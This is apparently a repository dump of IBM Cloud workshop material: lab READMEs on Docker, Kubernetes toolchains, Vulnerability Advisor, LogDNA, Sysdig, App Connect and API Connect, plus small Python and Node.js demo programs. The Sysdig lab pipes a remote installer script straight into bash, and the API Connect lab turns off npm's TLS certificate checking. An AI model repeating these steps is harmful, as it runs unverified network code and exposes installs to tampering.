fill="x") ftLabel = Label(ft, text="Compare Sheets", font="comicsansms 13 bold") ftLabel.pack() # Frame in Middle fm = Frame(root, bg = "black", borderwidth=5) fm.pack(pady=1, padx=4, fill="x") # Left Frame in Middle Frame fmm1 = Frame(fm, bg="black", borderwidth=2) fmm1.pack(side="left") f1 = Frame(fmm1, bg = "white", borderwidth=2) f1.pack(padx=112, pady=4, anchor="center") f1Label = Label(f1, text="Select File Format", padx=3) f1Label.grid(row=0, column=0, columnspan=2, pady=1, padx=1, sticky=E+W) rAValue = t.IntVar() rA1 = t.Radiobutton(f1, text = "CSV", variable = rAValue, value = 1) rA1.grid(row=1, column=0, pady=1, sticky=E+W) rA2 = t.Radiobutton(f1, text = "Excel", variable = rAValue, value = 2) rA2.grid(row=1, column=1, pady=1, sticky=E+W) button1 = t.Button(f1, text="Open File A", command=openFileFunA) button1.grid(row=2, column=0, columnspan=2, pady=1, sticky=E+W) colA = t.StringVar() boxA = ttk.Combobox(f1, textvariable=colA, state="readonly") boxA['values'] = 'Select-Column' boxA.current(0) boxA.grid(row=3, column=0, columnspan=2) button4 = t.Button(f1, text="Clear Table", command=deleteResult) button4.grid(row=4, column=0, columnspan=2, pady=1, sticky=E+W) # Right Frame in Middle fmm2 = Frame(fm, bg="black", borderwidth=2) fmm2.pack(side="right") f2 = Frame(fmm2, bg = "white", borderwidth=2) f2.pack(padx=112, pady=4, anchor="center") f2Label = Label(f2, text="Select File Format", padx=3) f2Label.grid(row=0, column=0, columnspan=2, pady=1, padx=1, sticky=E+W) rBValue = t.IntVar() rB1 = t.Radiobutton(f2, text = "CSV", variable = rBValue, value = 1) rB1.grid(row=1, column=0, pady=1, sticky=W+E) rB2 = t.Radiobutton(f2, text = "Excel", variable = rBValue, value = 2) rB2.grid(row=1, column=1, pady=1, sticky=E+W) button2 = t.Button(f2, text="Open File B", command=openFileFunB) button2.grid(row=2, column=0, columnspan=2, pady=1, sticky=E+W) colB = t.StringVar() boxB = ttk.Combobox(f2, textvariable=colB, state="readonly") boxB['values'] = "Select-Column" boxB.current(0) boxB.grid(row=3, column=0, columnspan=2) button3 = t.Button(f2, text="Compare", command=finalResult) button3.grid(row=4, column=0, columnspan=2, pady=1, sticky=E+W) # Frame in Bottom fb = Frame(root, bg="black", borderwidth=4) fb.pack(side="bottom", pady=1, padx=4, fill="x") tree = ttk.Treeview(fb) tree["columns"]=("one","two","three") tree.column("one", width=10) tree.column("two") tree.column("three") tree.heading("one", text="Serial Number") tree.heading("two", text="Value in file A") tree.heading("three", text="Value in file B") tree['show'] = 'headings' tree.pack(side="right", ipadx=windowWidth, ipady=windowHeight) scroll = t.Scrollbar(tree) scroll.pack(side="right", fill="y", pady=2) scroll.configure(command=tree.yview) tree.configure(yscrollcommand=scroll.set) root.mainloop()
ea7fd7eccf455eb467c6a25b3f09b1392de36c34
[ "Python" ]
1
Python
PardeepGrewal/Comapre-Sheets-excel-csv-
c11ac6bd7f464dd47391ea37e42e89fb5a82feed
770bb6868eb943579f00e295fbe9a0f0f2f7cfa8
refs/heads/master
<file_sep># Steps to execute Bulkhead demo ## Pre-requisite 1. Node.JS & NPM installation ## Steps 1. $ cd Bulkhead/BulkHeadAPI 2. $ npm install 3. $ npm start 4. `$ cd Bulkhead/ms1` && `$ cd Bulkhead/ms2` && `$ cd Bulkhead/ms3` in three different terminals. 5. `$ npm install` in all the three terminals 6. `$ npm start` in all the three terminals. 7. Enter command `requestdb`in all the three terminals Now you can see that the first two requests are served and then the third request is served after successful completion of first two requests. ``` The database server started Currently serving request number 1 Currently serving request number 2 Served request number 1 Currently serving request number 3 Served request number 2 Served request number 3 ```<file_sep>const express = require('express') const app = express() const port = 5000 const delay = require('delay'); var sem = require('semaphore')(2); //Capacity const cors = require('cors') app.use(cors()); var count=0; var flag=0; app.get('/getMongo', function(req, res){ res.write("In the queue ... "); sem.take(function() { count+=1; res.write("Under execution ... "); console.log("Currently serving request number "+count); setTimeout(leave,15000); function leave() { sem.leave(); res.end("Executed"); flag+=1; console.log("Served request number "+flag); } //console.log(sem.available()); //})(); }); } ) app.listen(port, () => console.log(`The database server started`)) //count-=1; //console.log("Currently serving "+count+" requests"); //console.log("Served "+count+" requests"); <file_sep># Develop a Kubernetes app with Helm using Continuous Delivery & Continuous Integration Learn how to create an application in IBM Cloud™ by using a basic starter kit and a Kubernetes toolchain, and continuously deliver the app to a secure container in IBM® Cloud Kubernetes Service. Your continuous integration DevOps pipeline can be configured so that your code changes are automatically built and propagated to the app that’s in the Kubernetes cluster. If you already have a pipeline, you can connect it to your app. ## Steps: 1. Create a [CONTINUOUS DELIVERY](https://cloud.ibm.com/catalog/services/continuous-delivery) service in IBM Cloud. `Create the service in the same region where cluster is deployed` 2. Create a Namespace in [Container Registry](https://cloud.ibm.com/kubernetes/catalog/registry) service(if you haven't done it yet) 3. Click on **ACCESS** in the Kubernetes cluster page and click on **Enable Toolchain** ![DevOps](https://github.com/IBMDevConnect/ibmdevday2019-cloud/blob/master/cicdworkshop/images/main.png) 4. Click on **Create** in the **Develop a Kubernetes app with Helm** option ![DevOps](https://github.com/IBMDevConnect/ibmdevday2019-cloud/blob/master/cicdworkshop/images/1.png) 5. In the redirected page, scroll down and, click CREATE next to **IBM Cloud API Key** Wait for the values to get auto populated and click on **CREATE** the toolchain. `SELECT same region of the deployed cluster region while creating the toolchain` ![DevOps](https://github.com/IBMDevConnect/ibmdevday2019-cloud/blob/master/cicdworkshop/images/7.png) 6. Click Delivery Pipeline and you can see the BUILD, VALIDATE and PROD stage(as shown below). The Build stage pulls the source code from your repository. It then runs jobs to compile or otherwise process the code to produce artifacts suitable for deployment. Each job runs in its own container. The artifacts are passed to follow-on stages through the build archive directory in the container. By default, this directory is the same as the directory where the source code was checked out. The Simple build job type passes the source code from your repo on as the result without modifying it. The Deploy stage contains jobs that deploy the artifacts created by the Build stage. ![DevOps](https://github.com/IBMDevConnect/ibmdevday2019-cloud/blob/master/cicdworkshop/images/6.png) ![DevOps](https://github.com/IBMDevConnect/ibmdevday2019-cloud/blob/master/cicdworkshop/images/new-main.png) 7. Click on **Deploy Helm Chart** within PROD stage to see the logs. ![DevOps](https://github.com/IBMDevConnect/ibmdevday2019-cloud/blob/master/cicdworkshop/images/2.png) 8. Scroll down and VIEW the application by clicking in the URL mentioned near **VIEW THE APPLICATION AT** ![DevOps](https://github.com/IBMDevConnect/ibmdevday2019-cloud/blob/master/cicdworkshop/images/5.png) ## Task 2: Update the application and redeploy it 1. Click on Eclipse Web Orion IDE in the Toolchain 2. Open the app.js file and edit res.send response to any message. `For eg: res.send('Welcome to IBM Cloud DevOps with Docker, Kubernetes and Helm Charts.I have learnt how to use the Continuous Delivery Service');` 3. In the left side, click on Git icon(second icon) and commit the changes by entering commit message in the right side. 4. Push the changes in the Outgoing branch. 5. Goto Delivery Pipeline to see the changes getting updated automatically and refresh the URL to see the updates you have made. Congratulations you have completed the lab! You have created a toolchain that deploys a "Hello World" app to a secure container in a Kubernetes cluster. You changed a message in the app and tested your change, and when you pushed the change to the repo, the delivery pipeline automatically redeployed the app! <file_sep># Secure your container images with Vulnerability Advisor Vulnerability Advisor checks the security status of container images that are provided by IBM®, third parties, or added to your organization's registry namespace.When you add an image to a namespace, the image is automatically scanned by Vulnerability Advisor to detect security issues and potential vulnerabilities. If security issues are found, instructions are provided to help fix the reported vulnerability. In this lab, you will learn how to secure your images and fix the vulnerabilites using Vulnerability Advisor. ## Pre-requisites 1. IBM Cloud Account ## Steps <p align="center"> <a href="https://cloud.ibm.com/developer/appservice/create-app?starterKit=ab2263e9-c787-32e6-a9d7-298c20557bbb"> <img src="https://cloud.ibm.com/devops/setup/deploy/button_x2.png" alt="Deploy to IBM Cloud"> </a> </p> Use the button above to deploy this same application to IBM Cloud. This option will create a deployment pipeline, complete with a hosted Git lab project and DevOps toolchain. You will have the option of deploying to either Cloud Foundry or a Kubernetes cluster. Step 1: Click on `Create` button to create the app Step 2: In the redirected page, Click on `Configure Continuous Delivery`.Enable continuous delivery to automate builds, tests, and deployments through Delivery Pipeline, GitLab, and more. Step 3: In the popup, Select `Deploy to IBM Kubernetes Service` and select the region where cluster is deployed and select the cluster. Click `Next` Step 4: In next step, Select the region in which cluster has been deployed and click on `Create`. Step 5: A toolchain have been created now with the starter application. Click on `View toolchain`. This will redirect you to Toolchain page. ### Security using Vulnerability Advisor 1. Click the Delivery Pipeline tile within the toolchain. 2. Follow the steps shown in below video: ![Video](./img/video_1.gif) **Please note: Container Registry namespace should be same as the one mentioned in Build Stage of this toolchain.** You will see that Validate stage fails. ### Let’s fix the vulnerabilities. 1. Open the cloned repository in an IDE or select Eclipse Orion web IDE tile, open Dockerfile and add the below command after EXPOSE 3000 ``` RUN apt-get update && apt-get install -y \ libc6 \ systemd \ sensible-utils \ isc-dhcp-client ``` 2. Commit and Push the changes. This should trigger the toolchain and fix the Validate Stage. Congratulations, you have completed the lab. In this lab, you have learnt how to use Vulnerability Advisor and how to fix the vulnerabilities. <file_sep># App Modernization Workshop Content 1. Container 2. Container Orchestration 3. Securing Containers 4. API Connect & App Connect 5. Transformation Advisor 6. Refactoring into microservices 7. Kabanero-Appsody-Codewind 8. DevOps- CI/CD 9. Helm Charts 10. Monitoring & Logging ## Contributors * <NAME> * <NAME> * <NAME> * <NAME> * <NAME> * <NAME> * <NAME> * <NAME> <file_sep># Log Analysis with LogDNA IBM® Log Analysis with LogDNA is a service that you can include as part of your IBM Cloud architecture to add log management capabilities. IBM Log Analysis with LogDNA is operated by LogDNA in partnership with IBM. You can use IBM Log Analysis with LogDNA to manage system and application logs in the IBM Cloud.IBM Log Analysis with LogDNA offers administrators, DevOps teams, and developers advanced features to filter, search, and tail log data, define alerts, and design custom views to monitor application and system logs. ## Pre-requisites 1. IBM Cloud Account 2. Kubernetes Cluster ## Steps 1. Provide required access to user a. Go to Manage->Access(IAM) b. select Users from left side menu c. select your user name d. Click on Access policies e. Click on `Assign Access` and select `Assign Access within a resource group` f. Select `default` as Resource Group and provide `Viewer` Access. Services let it be default and click assign g. Click on `Access policies` again h. Click on `Assign Access` and select `Assign Access to resource` i. Select `Kubernetes Cluster` as service , Select `All Region` in Regions and `All Instance` in Cluster j. Provide `Editor and Administrator` role and click assign k. Click on`Access policies` again l. Click on `Assign Access` and select `Assign Access to resource ` m. Select `IBM Log Analysis with logDNA` service for All Regions , All Instance n. Provide `Editor , Viewer and Manager` roles and click `Assign Service` 2. Create a logDNA service a. Go to Navigation Menu on Left and select Observability b. Select Logging and click on Create Logging instance c. Choose location same as your cluster location and resource group as default d. Use Lite plan and click on Create. You will see service created 3. Get ingestion key to be used by agent a. click on `View LogDNA`, to open LogDNA Dashboard, click on `settings ->Oraganisation->APIkeys` and copy the Ingestion key present there 4. Configure Kubernetes cluster to send logs a. Go to Dashboard->Cluster->Mycluster b. open web terminal(beta) c. execute `kubectl create secret generic logdna-agent-key --from-literal=logdna-agent-key=replace_with_logDNA_ingestion_key_copied_at_step_3a` d. execute `kubectl create -f https://assets.us-south.logging.cloud.ibm.com/clients/logdna-agent-ds.yaml` e. execute `kubectl get pods` 5. Launch LogDNA Dashboard a. Go to Navigation Menu->Observability->Logging b. Click on View LogDNA to launch the dashboard Congratulations, you have completed the lab! You have learnt how to stream logs with LogDNA from the IBM Cloud Kubernetes Cluster.<file_sep># Monitoring of Kubernetes using Sysdig Dashboard. IBM® Cloud Monitoring with Sysdig is a cloud-native, and container-intelligence management system that you can include as part of your IBM Cloud architecture. Use it to gain operational visibility into the performance and health of your applications, services, and platforms. It offers administrators, DevOps teams, and developers full stack telemetry with advanced features to monitor and troubleshoot, define alerts, and design custom dashboards. IBM Cloud Monitoring with Sysdig is operated by Sysdig in partnership with IBM. ## Prerequisites 1. IBM Cloud login 2. Kubernetes Cluster ## Steps: 1. Login to IBM Cloud 2. Provide access to your user for sysdig monitoring 1.From the menu bar, click Manage > Access (IAM). 2. Create an access group: sysdig-admins 2.1. Select Access Groups. 2.2. Click Create. 2.3 Enter the name of the access group: sysdig-admins. 2.4 [Optional] Enter a description. 2.5 Click create. 2.6 Click Add User. 2.7 Select the user and click on add to group. 3. Add access policy to the user, which is going to use Sysdig for monitoring 3.1. In Access IAM , go to user , and select your user 3.2. Click Access Policies tab 3.3. Click Assign Access. 3.4. Select `Assign Access within a Resource Group`. 3.5. Select the name of the resource group. Choose `Default`. `Note: You can use any other resource group where you have permissions in the account.` 3.6. Select the role. Choose Administrator. 3.7. Click Assign 3.8 Add another access policy by clicking `Assign Access` 3.9 Select `Assign Access to Resources` 3.10 Select `IBM Cloud Monitoring with Sysdig` 3.11 Select `All instance` in Service Instance 3.12 Provide `Administrator` access and click `save` 4. Add Sysdig monitoring Instance 4.1. from IBM Cloud Navigation menu (Hamburger menu), go to [Observability](https://cloud.ibm.com/observe) 4.2. Click on `Monitoring` 4.3. Click on `Create a Monitoring instance` 4.4. Provide a service name 4.5. Please make sure the region is same as your Kubernetes cluster region 4.6. Select Trial version and Click create 5. Create a key in Sysdig monitoring instance and get command to run agent: 5.1 click on 3 dots at right hand side of monitoring instance created and select on add key. 5.2 click on edit sources and copy the command availabe at step 2 in notepad for later steps. 6. Login to IBM Cloud to install sysdig agent 6.1. Open [https://katacoda.com/embed/terminal](https://katacoda.com/embed/terminal) 6.2 execute following command on terminal `curl -sL https://ibm.biz/idt-installer | bash` 6.3 Go to dashboard ->cluster->mycluster(clustername) 6.4 Click on mycluster(clustername) 6.5 From the access tabs execute the command specified in Kataconda terminal ``` ibmcloud login -a cloud.ibm.com -r us-south -g default (change the region based on the cluster region) ibmcloud ks cluster config --cluster replace_with_your_cluster_name (below command will come as output of executing above command) export KUBECONFIG=%HOMEPATH%\.bluemix\plugins\container-service\clusters\blqt6b8d062qlkfhap0g\kube-config-hou02-mycluster.yml Copy paste the command to your prompt and execute it. ``` 6.6. Execute command `ibmcloud target --cf` to select space 6.7 execute the command copied at step 5.2 6.8 verify `kubectl --namespace=ibm-observe get pods` to view the pods 7. View Sysdig dashboard 7.1 Go to Navigation menu->Observability > Monitoring. 7.2 Click View Sysdig 7.3 Click Next and select `Kubernetes|GKE|Openshift` option, Copy the 7.4 Once node is connected ,click on go to next step(visible in the same window) Congratulations, you have completed the lab. In this lab, you have learned how to get deep container visibility, service-oriented views and comprehensive metrics. <file_sep># Running Your First Container In this lab, you will run your first Docker container! Containers are just a process (or a group of processes) running in isolation. Isolation is achieved via linux namespaces and control groups. One thing to note, is that linux namespaces and control groups are features that are built into the linux kernel! Other than the linux kernel itself, there is nothing special about containers. What makes containers useful is the tooling that surrounds it. For these labs, we will be using Docker, which has been the de facto standard tool for using containers to build applications. Docker provides developers and operators with a friendly interface to build, ship and run containers on any environment. The first part of this lab, we will run our first container, and learn how to inspect it. We will be able to witness the namespace isolation that we acquire from the linux kernel. ## Pre-requisites: 1. Install Docker * [Docker for Windows](https://docs.docker.com/v17.09/docker-for-windows/install/) * [Docker for Mac](https://docs.docker.com/v17.09/docker-for-mac/install/) ## **Optional:** Use play-with-docker If you don't want to install Docker, an alternative is to use [Play-With-Docker](http://play-with-docker.com). Play-With-Docker is a website where you can run terminals directly from your browser that have Docker installed. All of the labs for this course can be run on Play-With-Docker, though we recommend installing docker locally on your host, so that you can continue your docker journey when this course has completed. To use Play-With-Docker, navigate to http://play-with-docker.com in your browser. ## Steps: We will start a container using verified images from the Docker Store: nginx web server. 1. Run an Nginx server Let's run a container using the [official Nginx image](https://store.docker.com/images/nginx) from the Docker Store. ```sh $ docker container run --detach --publish 8080:80 --name nginx nginx Unable to find image 'nginx:latest' locally latest: Pulling from library/nginx 36a46ebd5019: Pull complete 57168433389f: Pull complete 332ec8285c50: Pull complete Digest: sha256:c15f1fb8fd55c60c72f940a76da76a5fccce2fefa0dd9b17967b9e40b0355316 Status: Downloaded newer image for nginx:latest 5e1bf0e6b926bd73a66f98b3cbe23d04189c16a43d55dd46b8486359f6fdf048 ``` We are using a couple of new flags here. The `--detach` flag will run this container in the background. The `publish` flag publishes port 80 in the container (the default port for nginx), via port 8080 on our host. Remember that the NET namespace gives processes of the container their own network stack. The `--publish` flag is a feature that allows us to expose networking through the container onto the host. How do you know port 80 is the default port for nginx? Because it is listed in the [documentation](https://store.docker.com/images/nginx) on the Docker Store. In general, the documentation for the verified images is very good, and you will want to refer to them when running containers using those images. We are also specifying the `--name` flag, which names the container. Every container has a name, if you don't specify one, Docker will randomly assign one for you. Specifying your own name makes it easier to run subsequent commands on your container since you can reference the name instead of the id of the container. For example: `docker container inspect nginx` instead of `docker container inspect 5e1`. Since this is the first time you are running the nginx container, it will pull down the nginx image from the Docker Store. Subsequent containers created from the Nginx image will use the existing image located on your host. Nginx is a lightweight web server. You can access it on port 8080 on your localhost. 2. Check your running containers with `docker container ls` ```sh $ docker container ls CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES d6777df89fea nginx "nginx -g 'daemon ..." Less than a second ago Up 2 seconds 0.0.0.0:8080->80/tcp nginx ``` 3. Access the nginx server on http://localhost:8080. If you are using play-with-docker, look for the `8080` link near the top of the page. Congratulations, you should now see your Nginx web server container running on your host! <file_sep># APP-Connect-handson ## Overview In this lab, you will create a simple application flow using IBM App Connect. You will create a basic application flow for both event driven flows and flows for API. ## [Steps to register for IBM Cloud](https://github.com/rachana5198/APP-Connect-handson#steps-to-register-for-ibm-cloud) Go to [IBM Cloud](https://cloud.ibm.com/login) If you are an existing user, login using your credentials. If you are new user, register for IBM cloud and login. ![](img/cloudlogin.png) ## [Setup an APP Connect service](https://github.com/rachana5198/APP-Connect-handson#setup-an-app-connect-service) 1. Let's go to [IBM Cloud Catalog](https://cloud.ibm.com/catalog) and search for App Connect. ![](img/catalogsearch.png) 2. Click on the service App Connect to instantiate it on IBM cloud. 3. Click on ```create``` ![](img/instancecreation.png) 4. Launch the service by clicking ```Launch App Connect``` ![](img/launch.png) ## [Creating event driven flows](https://github.com/rachana5198/APP-Connect-handson#creating-event-driven-flows) 1. After launching the dashboard, click on New. (Rename your flow, if needed) To create a new event driven flow, ```New -> Event-driven flow``` ![](img/newflow.png) 2. To add applications to your flow, Click on '+' and select applications that you want to add to your flow. Here, we are creating a simple flow to send slack messages at some interval of time. 3. To be able to schedule events, there is a tool called scheduler in the toolbox. To add this to your flow, ```+ -> Toolbox -> Scheduler``` ![](img/scheduler.png) 4. Configure the scheduler component according to your preferences. Here I am creating a flow that sends slack message for every one minute. ![](img/plus.png) 5. To add the next node to the flow, click on '+'. Here, we are adding email component so that we will be able to send message at scheduled time. To do this, ```+ -> Applications -> Slack -> Create message``` ![](img/slack.png) 6. Connect the account using which you want to automate this task(preferably your gmail account). To connect your account, ```Click on Slack node -> Connect```. This will redirect you to gmail login page, finish the login and permissions and refresh the IBM App connect page, then you should be able to see your account in the drop down. ![](img/connect.png) 7. Configure the slack node with your workspace url. If you don't have a [Slack workspace](https://slack.com/create), create a workspace for testing purposes. ![](img/slack1.png) Click allow ![](img/slackallow.png) Enter details in the slack nodes ![](img/configure.png) 8. To start the flow, click start from the right corner of the screen. ![](img/starteflow.png) 9. Once the flow starts and the dashboard shows the status 'Running' that means the event flow has started. To cross check, go to your Slack and see if there is a new message. ![](img/outputeflow.png) This is how event driven flows work, scroll down to see some sample flows in Sample flows section. ## [Creating flows for API](https://github.com/rachana5198/APP-Connect-handson#creating-flows-for-api) 1. To create flows for API, launch the App Connect dashboard and click on new then select flows for API. ``` Launch dashboard -> New -> Flows for API ``` ![](img/newaflow.png) 2. On creating, it will take you to the service page. Rename the flow(if needed). Give a name to the flow and click on Create model. ```Enter a model name -> create model``` ![](img/mname.png) 3. Add the properties that you want to add to the model that you are creating. Here, I am creating a simple flow that sends emails on sending a API request. ![](img/props.png) 4. After defining the properties, operations have to be added. Click on operations and select the operation that you want to perform. Here, I am selecting Create demo as operation. ``` Operations -> (scroll down) Create Demo``` ![](img/operations.png) 5. Wait for the model to load and then start adding nodes to your flow. I have added a POST method which automatically generated Request and Response nodes. Make sure that the request node has sample data configured in it which is auto-generated. Refresh the page if you are not able to see the changes. Click on `Implement Flow`. ![](img/implementflow.png) 6. To add nodes to your flow, click on '+' which is in between request and response nodes. Then, add nodes to your flow. Here, I am adding a Slack node to the flow. ``` + -> Applications -> Slack -> Create message ``` ![](img/plusslack.png) 7. Configure the slack node. If it's not connected, click on connect and give access to your account/default account that you want to set up. Check if your node is connected to your account. Refresh the page to see changes and make sure you see your account details when you click on the node. You can auto match the node fields or add them manually. Here, I am adding auto matched fields which are the node properties that we have added to the flow in the beginning. ![](img/slackconfigure.png) 8. Now configure the response node as well. We can either auto match the node details or give them manually. Here we have given them manually, based on requirement we can auto-match. ![](img/response.png) 9. Once when all the nodes of the flow are configured, click ```Done``` on the right corner of the screen. This will take you to the previous screen and you can see properties and operations on the screen. ![](img/response.png) 10. Now that the flow creation is done, we have to create an API to call the flow. To do this go to manage section of the dashboard. 11. ``` Manage -> Scroll``` ![](img/manage.png) 12. On the end of screen, click on create API under Sharing outside of cloud foundry organization. ```Manage -> Sharing Outside Cloud Foundry organization -> Create API``` ![](img/scroll.png) 13. Give the details required for API creation in the pop-up generated on clicking Create API. ```Create API -> Fill details -> Done``` ![](img/createapi.png) 14. Refresh the page. Start the flow by clicking Start from right corner of the screen.```Manage -> Start API``` and then click on the API link from ```Manage -> Sharing Outside Cloud Foundry organization -> Click API link```. This will redirect you to the API page. ![](img/link.png) 15. Click on ```Try it``` from the right corner which will generate automatic data. ![](img/tryit.png) 16. To test the API call, click on ```Call Operation```. ![](img/calloperation.png) 17. To check if the API is working, go to the Slack channel that you have set in the configuration flow. It will look something like this: ![](img/aoutput.png) Congratulations, You have completed the lab. You have learnt 1. How to create a basic event-driven flow that sends a simple message at scheduled time using APP Connect on IBM Cloud. 2. How to create a basic flow for API that sends a simple message on slack when the API operation is called using APP Connect on IBM Cloud. You can try out the below **Next steps** to explore further on App Connect. # Next Steps ## [Import and export flows](https://github.com/rachana5198/APP-Connect-handson#import-and-export-flows) #### EXPORT FLOWS 1. To export a flow, go to App Connect dashboard and click on the flow that you want to export. On clicking, select the option export flow. ```App Connect Dashboard -> Flow -> Export Flow``` ![](img/ef1.png) 2. Once you click on that, a yaml file is downloaded with the flow name. In this case, it is ```simple-scheduler.yaml``` ![](img/exportflow.png) #### IMPORT FLOWS 1. To import a flow, click on New from the right corner of App Connect Dashboard and select import flow. ```App Connect Dashboard -> New -> Import flow``` ![](img/if1.png) 2. Drag and drop the .yaml file of the flow that you want to import onto the dashboard of App Connect. ```drag and drop simple-scheduler.yaml -> Import flow``` ![](img/if2.png) 3. On finishing the import, you will be able to see a new flow on your App Connect dashboard. Start it to run the flow. ![](img/final.png) ### [Sample flows](https://github.com/rachana5198/APP-Connect-handson#sample-flows) 1. Use the For Each node and JSONata to process high-priority issues. ![](img/sf1.png) 2. Create new leads in ```Marketo``` by capturing lead names and details in ```Slack``` ![](img/sf2.png) 3. For large ```Salesforce``` opportunities, send an email and create an ```Asana``` task ![](img/sf3.png) 4. At regular intervals, extract ```Salesforce lead details``` and upload ```Box files``` with CSV output. ![](img/sf4.png) 5. Create ```NetSuite ERP``` and Stripe products from ```Asana tasks``` to launch a ```Salesforce Pardot campaign```. ![](img/sf5.png) 6. Build an API to create or update leads in ```Salesforce``` based on a ```Google Sheets spreadsheet```. ![](img/sf6.png) ## [Integration servers with APP connect](https://github.com/rachana5198/APP-Connect-handson#integration-servers-with-app-connect) 1. Click New > Import a BAR file. ![](img/is1.png) 2. Either click the “Import a BAR file” dialog box to select a BAR file from your file system, or drag a BAR file from your file system to the dialog box. ![](img/is2.png) 3. Click Import. An integration server is created, and a tile is added to the dashboard to represent it. Initially, you’ll see the status as “Preparing”, which means that the contents of the BAR file are being unpacked onto the integration server. When preparation has finished, the status will show as “Stopped”, indicating that the integration server is ready to be configured and started. If you see a message saying that preparation failed, click Try again in the message to start preparation again. You can see a summary of the contents of the integration server by clicking the arrow. The arrow icon that allows you to see a summary of the contents of an integration server on the tile. 4. Open the integration server by clicking the tile, or expanding the tile menu (⋮) and then clicking Open. 5. Configure the integration server and start it. 6. When you’ve completed configuration, return to the App Connect on IBM Cloud dashboard and start the integration server by opening the tile menu and then clicking Start. ![](img/startis.png) 7. You can also use the tile menu to delete or update the BAR file. The “update” option allows you to upload a new version of a BAR file. On clicking the integration server that you have uploaded, it looks something like this: ![](img/viewlogs.png) 8. When your integration server is running, you can view logs by opening the integration server and then clicking View logs. ```Server page -> View logs``` ![](img/viewlogs.png) ![](img/isoutput.png) <file_sep>var http=require('http'); const inquirer = require('inquirer') var result="none"; const jsdom = require("jsdom"); const dom = new jsdom.JSDOM(`<!DOCTYPE html>`); var $ = require("jquery")(dom.window); const circuitBreaker = require('opossum'); var questions = [{ type: 'input', name: 'name', message: "Command : ", }] http.createServer(function (request, response) { //function called when request is received response.writeHead(200, {'Content-Type': 'text/plain'}); //send this response response.end(result); }).listen(3600, '127.0.0.1'); const route = 'http://localhost:5000/getMongo'; function tryagin() { //Request the API var request1=http.request({ 'host': 'localhost', 'port': 5000, 'path': '/getMongo', 'method': 'GET' }); //assign callbacks request1.on('response', function(response) { // console.log('Response status code:'+response.statusCode); response.on('data', function(data) { console.log(''+data); }); }).on('error', function(e) { //console.error("ms2 : I am Dead"); }); request1.end(); } function recur(){ inquirer.prompt(questions).then(answers => { if(`${answers['name']}` == "requestdb") { tryagin(); } recur(); }) } recur(); //setInterval(check, 1000); <file_sep># API Connect hands-on ## Overview IBM API Connect is a comprehensive end-to-end API lifecycle solution. APIs are created within the developer toolkit. The developer toolkit includes a CLI and API Designer graphical user interface. To access the developer toolkit, you need to download and install it from npm. When you install the toolkit, you begin by creating a LoopBack project \ • ```LoopBack project```: The LoopBack project contains the LoopBack application and API Product \ • ```LoopBack application```: Within the Loopback application is the API endpoint that provides access to your data source, business asset, or cloud service \ • ```Product```: The Product is the unit that enables you to publish your APIs. A Product contains a Plan and a Plan contains the API that invokes the API endpoint when it is called. ## Items to be covered: 1. Create a new LoopBack project. 2. Add a new data source and model to a LoopBack project using the API Designer in the IBM® API Connect for IBM Cloud toolkit. Pre-requisites: 1. An IBM Cloud account with Organization and Spaces created within account. 2. Install Node.js and npm 3. Before you begin, install the API Connect toolkit. ## [Steps to register for IBM Cloud](https://github.com/rachana5198/APP-Connect-handson#steps-to-register-for-ibm-cloud) Go to [IBM Cloud](https://cloud.ibm.com/login) If you are a existing user, login using your credentials. If you are new user, register for IBM cloud and login. ![](img/Picture1.png) ## Steps to install NODE.JS 1) Download and install node.js from one of the two sources: https://nodejs.org/en/download/ (Note: Download the LTS version for your platform, not the latest, or you might experience errors.) OR o https://developer.ibm.com/node/sdk/v6/ Installing node.js also installs npm (Node Package Manager). 2) Once Node.js is downloaded and install, check to make sure it is in your PATH. 3) Update npm. In a command line, enter npm install -g npm Check the installed version and path. ![](img/Picture2.png) ## Install the API CONNECT TOOLKIT 1) Update the npm config to allow use of untrusted certificates. npm config -g set strict-ssl false 2) Install the API Connect toolkit from npm. npm install -g apiconnect 3) Check the installed version. apic -v 4) Enter the following command on the command line: npm install -g microgateway We will use the Microgateway as a local test server. Here we should have successfully installed the IBM API Connect. Once the toolkit is installed,You can verify this by entering the following command on the command-line: ![](img/Picture3.png) ## Let us now move to the objective of this hands on. ## CREATE A LOOPBACK PROJECT To create a LoopBack project using the API Connect toolkit command line, complete the following steps: 1) From the command-line interface, enter the following commands. It is used to create and manage LoopBack applications. ![](img/Picture4.png) For this session we will create a project called ```weather-data``` ![](img/Picture5.png) This process creates a node_modules directory and might take some time. An empty LoopBack project contains the following directories: ![](img/Picture6.png) ## ADD A NEW DATA SOURCE AND MODEL To add a new model and data source to a LoopBack project using the API Designer, complete the following steps: ## Add a data source To add a new data source to a LoopBack project using the API Designer, complete the following steps. 1) You must also create a LoopBack project (the "weather-data" project) as described in Create a LoopBack project from the command line and make sure the current working directory is the project root directory 2) From the command line, enter the following command:```apic edit``` After a brief pause, the console displays this message: ![](img/Picture7.png) The API Designer opens in your default web browser, initially displaying the login page if you haven't logged in recently. ![](img/Picture8.png) 3)Login using your IBM Cloud credentials ![](img/Picture9.png) 4)Click the Data Sources icon ![](img/Picture10.png) ![](img/Picture11.png) 5) Click Add. The New LoopBack Data Source window opens. 6) Enter ```weatherDS``` in the Name text field ![](img/Picture12.png) 7) Click New 8) By default, the Connector setting shows In-memory db and the other settings are blank. Keep the default settings for now, and API Designer automatically saves the new data source. ![](img/Picture13.png) 9) Click the Test Connection icon ![](img/Picture14.png) to test the data source connection. The message "Data source connection test succeeded" is displayed. ![](img/Picture15.png) 10) Click ```All Data Sources``` The data source will appear in the list of data sources, and the editor updates the server/datasources.json file with settings for the new data source. ![](img/Picture16.png) ## Add a model To add a new model to a LoopBack project using the API Designer, complete the following steps: 1) Click the Models icon![](img/Picture19.png) \ 2) Click Add. The New LoopBack Model window opens. \ 3) Enter weather in the Name text field, then click New. ![](img/Picture17.png) 4) In the Data Source field, select ```weatherDS``` ![](img/Picture18.png) 5) In the Properties, click the Add property icon . \ 6) In the Property Name text field, enter zip_code. \ 7) For Type, select number. \ 8) Select Required to make the property required. This means that it must have a value when you add or update a model instance. \ 9) Select ID to ensure that the property has a unique identifier. For now, keep the default values for the other settings: ![](img/Picture20.png) 10) Click the Add property icon![](img/Picture21.png) again to add another property. Reference the table below to complete the remaining properties: ![](img/Picture22.png) 11) Click the Save icon to save your changes![](img/Picture23.png) 12) Click All Models to finish editing the model This completes adding a new data source and model to the weather-data LoopBack project Congratulations, you have completed the lab! You have now learnt how to create a loopback project by adding data source and model. ## Next Steps: Publishing API CONNECT to IBM CLOUD Please refer to the video below to understand how we can publish the API Connect projects to the IBM Cloud Catalog. [![Publish Api Connect 